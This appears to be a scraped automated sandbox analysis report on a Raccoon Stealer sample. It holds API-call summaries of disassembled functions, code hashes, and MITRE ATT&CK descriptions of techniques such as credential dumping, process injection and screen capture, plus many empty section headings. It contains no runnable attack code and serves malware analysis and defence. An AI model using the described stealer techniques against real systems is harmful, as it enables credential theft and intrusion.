GetLastError.KERNEL32(?,?,?,0041379B,?,?,?,00000000,00000000,?,?,00000007), ref: 0043EDA3
WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,0041379B,?,?,?,00000000), ref: 0043EDC9
GetLastError.KERNEL32(?,?,?,0041379B,?,?,?,00000000,00000000,?,?,00000007), ref: 0043EDD5

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 7f6659209fded86330dfa8a48f0bc75e383ea20003062e6b7bd9243538b21101
Instruction ID: 859ff3857c03709ba9d0b23b64cb5ea5ca84e6fecc55aa79cc264395068d32c1
Opcode Fuzzy Hash: 7f6659209fded86330dfa8a48f0bc75e383ea20003062e6b7bd9243538b21101
Instruction Fuzzy Hash: D8011236B01156BB8F221F92DC08C9B3F66EFDD7A0F144025FE0555260DA71C822E7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0046676B, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,00421A56,?,00000000,?,?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD), ref: 00466782
GetLastError.KERNEL32(?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD,00000000,~eD,?,00457EBF,00000010), ref: 0046678E

Part of subcall function 00466754: CloseHandle.KERNEL32(FFFFFFFE,0046679E,?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD,00000000,~eD), ref: 00466764

___initconout.LIBCMT ref: 0046679E

Part of subcall function 00466716: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00466745,0046346C,~eD,?,0045796B,00000000,00000005,~eD,00000000), ref: 00466729

WriteConsoleW.KERNEL32(?,00421A56,?,00000000,?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD,00000000), ref: 004667B3

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ae5fb481802a9fa235141cf9efdc422cb2e1fe685c935f6145ad48c9fe88c6fa
Instruction ID: 763e7f8f878b4b777fd66d5375950774efbffa6078b9868dc8d7e1678cf0744a
Opcode Fuzzy Hash: ae5fb481802a9fa235141cf9efdc422cb2e1fe685c935f6145ad48c9fe88c6fa
Instruction Fuzzy Hash: 41F01236901115BFCF221F96DC049CA7F66EB097A5F064465FA1885120EA71C860DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043EB8D, Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

CreateSymbolicLinkW.KERNEL32(0040B622,?,?,?,0043EFB8,0040B622,?,00000000,?,0040B05E,?,?,?,?,?), ref: 0043EB9D
GetLastError.KERNEL32(?,0043EFB8,0040B622,?,00000000,?,0040B05E,?,?,?,?,?,?,0040B622,?), ref: 0043EBA7
CreateSymbolicLinkW.KERNEL32(0040B622,?,?,?,0043EFB8,0040B622,?,00000000,?,0040B05E,?,?,?,?,?), ref: 0043EBBB
GetLastError.KERNEL32(?,0043EFB8,0040B622,?,00000000,?,0040B05E,?,?,?,?,?,?,0040B622,?), ref: 0043EBC5

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateErrorLastLinkSymbolic
String ID:
API String ID: 191780330-0
Opcode ID: 557c0450dcf72cd336c77947ed3641629258dc9ac66ee84a76f6f8eeb026ee04
Instruction ID: bfcc5d3bec73c7e3439f6908d7d2abe7d2301890aee706999ffa58237ad5accd
Opcode Fuzzy Hash: 557c0450dcf72cd336c77947ed3641629258dc9ac66ee84a76f6f8eeb026ee04
Instruction Fuzzy Hash: 61E09234905108FF8F02BF92DC04C5E7BAAFF08740F044465F91695031D731D961AB19

Uniqueness

Uniqueness Score: -1.00%

Function 0045293D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004529CD

Strings

pow, xrefs: 004529A5, 004529C2

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 5d3b4b31217a3aca56cef5da44c31b20b25d13a0e8c3bca57b1a042be99e7bd2
Instruction ID: f57b068ca202939e6be089322848423b8956c0ac15da669c57a9b2c85ad371fb
Opcode Fuzzy Hash: 5d3b4b31217a3aca56cef5da44c31b20b25d13a0e8c3bca57b1a042be99e7bd2
Instruction Fuzzy Hash: 81514E61A0410296C7157B15CA4136B2B90EB41B53F244D6BECC5413EBEFBD8CDD9A4F

Uniqueness

Uniqueness Score: -1.00%

Function 0041A31F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041A324

Strings

RR, xrefs: 0041A347
dm|{, xrefs: 0041A36B

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: RR$dm|{
API String ID: 3519838083-3963068849
Opcode ID: df27152f060cb63d11839022372b904961f4631b23480777441acb27424777f3
Instruction ID: b30e87a83c857d55b2fceb9bedb5715a1448a84e52f685d6d7980b7f264c2b1f
Opcode Fuzzy Hash: df27152f060cb63d11839022372b904961f4631b23480777441acb27424777f3
Instruction Fuzzy Hash: 8441C431D052488FCF05EFE9D6915EDFBB1AF59304F24842EE4117B282DB782A4ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A440, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog2.LIBCMT ref: 0040A447

Strings

: ", xrefs: 0040A4EF
", ", xrefs: 0040A50E

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog2
String ID: ", "$: "
API String ID: 1857396960-747220369
Opcode ID: 3ebb163524b836a58e9336528dcddfb99cc604da141eb6db7052139b9219902c
Instruction ID: 14ddc9e10715370709e437af70b930bef286e9181cfd7794aa4f128aeba5fdd1
Opcode Fuzzy Hash: 3ebb163524b836a58e9336528dcddfb99cc604da141eb6db7052139b9219902c
Instruction Fuzzy Hash: 6231D0B0A01204AFCB14DF65D946BDEFBB5EF44704F10406FE405AB2C1EBB8AA55CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00426CC9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426CCE

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426D87
object != nullptr, xrefs: 00426D8C

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: 0ed2f3a0d7ad50c2f0f8df19aab46ac9870abeff396fbdddf03c5da5d77ad745
Instruction ID: d588f42d78a487c8651ebf323b21b14c2d5a598c9bd3e3ab5cf4a9afda7fafb6
Opcode Fuzzy Hash: 0ed2f3a0d7ad50c2f0f8df19aab46ac9870abeff396fbdddf03c5da5d77ad745
Instruction Fuzzy Hash: FE313171B1061A8BC701CF6AD091A6ABBB0FF81304F54811FD049A3751CB38AE40CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00432C77, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00432C7C

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00432CAE
object != nullptr, xrefs: 00432CB3

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: 24d68d3ba59accc068199425cd936739c8d372f00a6450e9365642f7ae4c8db8
Instruction ID: a3445ea1db4b01ca46f117caf533ded59e73d085720f748eb158daf7e430debb
Opcode Fuzzy Hash: 24d68d3ba59accc068199425cd936739c8d372f00a6450e9365642f7ae4c8db8
Instruction Fuzzy Hash: E7212776A002159FDB04DF69D981BEEFBB4FF58304F10812EE445A7391DB78AA05CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0043A929, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043A92E

Strings

false, xrefs: 0043A98B
true, xrefs: 0043A99E

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: false$true
API String ID: 3519838083-2658103896
Opcode ID: 554a9e8c29aeda20e02ce97903ee5a4130f6d8e91c2360f5ad8c9ebe88ee43c1
Instruction ID: 5b8a111ec777184d3b9285b5462081de3ad4d40af5247b6b8f630398567f009f
Opcode Fuzzy Hash: 554a9e8c29aeda20e02ce97903ee5a4130f6d8e91c2360f5ad8c9ebe88ee43c1
Instruction Fuzzy Hash: 4521A1B2940744AEC320EFB5D441B9ABBF8EF09300F00C92FE4E697651EB78A504CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0042C0C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0042C0E2
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 0042C107

Strings

image/jpeg, xrefs: 0042C115

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EncodersGdipImage$Size
String ID: image/jpeg
API String ID: 864223233-3785015651
Opcode ID: 1e918e1725a8a157f9196d56c2c9260e5b01738356bce498a86fa547f4107225
Instruction ID: 808b449813365729b0edeeee678a10cb9db49e559912ab6d87952b6290e95faf
Opcode Fuzzy Hash: 1e918e1725a8a157f9196d56c2c9260e5b01738356bce498a86fa547f4107225
Instruction Fuzzy Hash: 5111E732E00118EB8B109F999CC14AEBBB5FE45360B60016BF81073291C7755E559E98

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CC0D

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

, column , xrefs: 0041CC7C
at line , xrefs: 0041CC60

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: at line $, column
API String ID: 3708980276-191570568
Opcode ID: 12f39291e4d80daac8708076b24241cc6254ce90581f51bea7d3b8192ac938ef
Instruction ID: 09c8498a4e1e5b2bbd83ea2cce7dd7688a8647a19e90f87bfa3ac21dfedca142
Opcode Fuzzy Hash: 12f39291e4d80daac8708076b24241cc6254ce90581f51bea7d3b8192ac938ef
Instruction Fuzzy Hash: 68218171910118DBCB19EB91CC91AEDB779EF54304F40805FE416A3281EFB85E4ACB65

Uniqueness

Uniqueness Score: -1.00%

Function 00454623, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 0045AB16: MultiByteToWideChar.KERNEL32(00460412,00000100,E8458D00,00000000,00000000,00000020,?,0045D9C1,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 0045AB86

Part of subcall function 0045850D: HeapAlloc.KERNEL32(00000008,?,00000000,?,0045736D,00000001,00000364,00000008,000000FF,?,004401D2,?,?,00414650,?), ref: 0045854E

_free.LIBCMT ref: 0045467D

Part of subcall function 00457FE3: RtlFreeHeap.NTDLL(00000000,00000000,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?), ref: 00457FF9
Part of subcall function 00457FE3: GetLastError.KERNEL32(?,?,0046146B,?,00000000,?,?,?,0046170E,?,00000007,?,?,00461B0F,?,?), ref: 0045800B

_free.LIBCMT ref: 00454693

Strings

HXk, xrefs: 00454628

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap_free$AllocByteCharErrorFreeLastMultiWide
String ID: HXk
API String ID: 2264667202-701131494
Opcode ID: 86a5b5d3014b6f83f8f478eadf58d2213a864a731e26edcaedaf543a775db22f
Instruction ID: bc681d83d5f84e6f5bd839b78c896df346e13688c98fbd9687c1fe4080105e9a
Opcode Fuzzy Hash: 86a5b5d3014b6f83f8f478eadf58d2213a864a731e26edcaedaf543a775db22f
Instruction Fuzzy Hash: 3101ADA26052153AA21025BA5C81E27628CCE823BE724062BFD249A3C3EA9CDD5801AC

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9EC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041C9F1

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

[json.exception., xrefs: 0041CA18
6rkw, xrefs: 0041CA02, 0041CA75

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: 6rkw$[json.exception.
API String ID: 3708980276-421156741
Opcode ID: ae89db7eb9d074b4fbd33854220203b5213a49dbe4b20eeb4445b8a340d7e3a5
Instruction ID: c627d136464e43b18722d203518cf07b090df2e94217dcff2b1788000faf46b6
Opcode Fuzzy Hash: ae89db7eb9d074b4fbd33854220203b5213a49dbe4b20eeb4445b8a340d7e3a5
Instruction Fuzzy Hash: D0118671D10158DFCB05EBE5C891AEDBBB4EF55318F10806FE006A3282DBB89A85CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00426F3F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426F44

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426F62
m_object != nullptr, xrefs: 00426F67

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$m_object != nullptr
API String ID: 3519838083-1282721270
Opcode ID: 19e689fea6f9218d698b1b6086db7d89be0538ffb0f04455343cf7b5714505fe
Instruction ID: a262645e179417d48e5ee7b6692ceab2061b25bda155611561e12e8cfc6cc9ba
Opcode Fuzzy Hash: 19e689fea6f9218d698b1b6086db7d89be0538ffb0f04455343cf7b5714505fe
Instruction Fuzzy Hash: 93117C71600110EBCB14EFAAEA81A9AB7F5EB14314F65885BE445E3640D778FE40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042653C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426541

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426588
object != nullptr, xrefs: 0042658D

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: eda85bbb29f7a67d2c6e0959c6dfc428d70cef0677166bed7515c0ccf7fb8bfe
Instruction ID: 576cac20529d08dd017f4d20a09ad8b78334590e865ddf8fdf419cb452501d68
Opcode Fuzzy Hash: eda85bbb29f7a67d2c6e0959c6dfc428d70cef0677166bed7515c0ccf7fb8bfe
Instruction Fuzzy Hash: 92F0AF71E403149FD351DF689802749BBF4EF04B04F10806FE849EB341E6788A04CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004542F3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045433B

Strings

HXk, xrefs: 0045432D

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free
String ID: HXk
API String ID: 269201875-701131494
Opcode ID: e23c552bf6bfc6e7df87c784f5635b051a6b7052c5b1130287b4626a5af3a196
Instruction ID: d5218cd339a65762510a81b9e079e4446c8f6c3996e41a5cb6ded0dde42ff173
Opcode Fuzzy Hash: e23c552bf6bfc6e7df87c784f5635b051a6b7052c5b1130287b4626a5af3a196
Instruction Fuzzy Hash: 49E0303270951066D221662B6C0566E15859BD133FF11033FFC208E5F2DB6C488A959E

Uniqueness

Uniqueness Score: -1.00%

Function 004265A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004265AE

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004265E4
object != nullptr, xrefs: 004265E9

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
API String ID: 3519838083-2355325030
Opcode ID: c3624f42af5ef45d717d2a4f4b7c771181dc4fe7f73c66e646fa7be1d422f0e3
Instruction ID: 6c344f967f61df9999932ce3ab7ba41ba1deb411c9b6cb5ba1a866f0604a8197
Opcode Fuzzy Hash: c3624f42af5ef45d717d2a4f4b7c771181dc4fe7f73c66e646fa7be1d422f0e3
Instruction Fuzzy Hash: 06F0A071E40224A7CB11ABA495027DEBBB4DB44B58F10816FE805A2282DAB80A4487DA

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 8aAG42oIjb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Raccoon Stealer

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

